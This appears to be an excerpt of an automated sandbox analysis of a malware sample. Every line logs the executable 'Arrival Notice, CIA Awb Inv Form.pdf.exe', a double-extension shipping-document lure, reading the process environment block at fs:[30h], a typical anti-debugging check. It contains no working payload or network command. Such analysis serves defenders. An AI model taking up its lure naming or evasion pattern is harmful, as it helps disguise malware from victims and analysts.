    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1BE80 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAEEE7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA93EFC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA77EC3 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA77EC3 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4EC1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BED0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB9ED2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA31ED8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3EE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBE18 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3E01 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F2E32 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4E03 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA28E15 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4E62 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAEE78 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CE70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA27E71 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EDE45 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EDE45 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EFE40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1EE48 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1E70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6DE50 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA28FBC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F4FB6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1BF93 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1FAA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E9FD0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4FFF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18FFB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBFC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAEFD3 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FFDC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DF36 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F3C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F3C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F3C mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA78F3C mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0CF00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0CF00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FF03 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BF0C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EFF30 mov edi, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4F1D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]
